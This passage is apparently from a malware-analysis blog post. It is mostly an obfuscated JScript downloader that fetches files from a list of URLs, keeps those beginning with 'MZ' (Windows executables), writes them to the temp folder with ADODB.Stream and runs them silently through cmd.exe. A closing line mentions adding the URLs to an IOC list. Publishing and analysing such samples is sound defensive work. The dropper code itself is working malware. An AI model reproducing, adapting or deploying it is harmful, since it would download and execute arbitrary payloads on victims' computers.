    var ub = new ActiveXObject( "Scripting.FileSystemObject" ).GetSpecialFolder( 2 );
    var bi = "/da" + ui( 0, 999999 ) + ".aoo";
    return ub + bi;
}

function zkr( aa )
{
    var ii = new ActiveXObject( "WScript.Shell" );
    var hik = 'cmd.exe /c "' + aa + '"';
    var yis = ii.Run( hik, false );
    
    }

function xao( puw, aa )
{
    soj.Open();
    soj.Type = 1;
    soj.Write( puw );
    soj.Position = 0;
    soj.SaveToFile( aa, 2 );
    soj.Close();
}

function ouq( ej )
{
    return ej.responseText.match( /^MZ/ ) !== null;
}

var ej = new ActiveXObject( "MSXML2.XMLHTTP" );
var soj = new ActiveXObject( "ADODB.Stream" );
while( true ) {
    var olx = yei();
    if( ! olx ) {
                break;
    }
    try {
                ej.Open( "GET", olx, false );
        ej.Send();
        
        
        if( ouq( ej ) ) {
                        var aa = kio();
            xao( ej.ResponseBody, aa );
                        zkr( aa );
                        
            break;
        }
        else {
                    }
    }
    catch( zwr ) {
            }
}

I have updated the IOC list to include the URLs found in the code.

Leave a Reply

Your email address will not be published. Required fields are marked *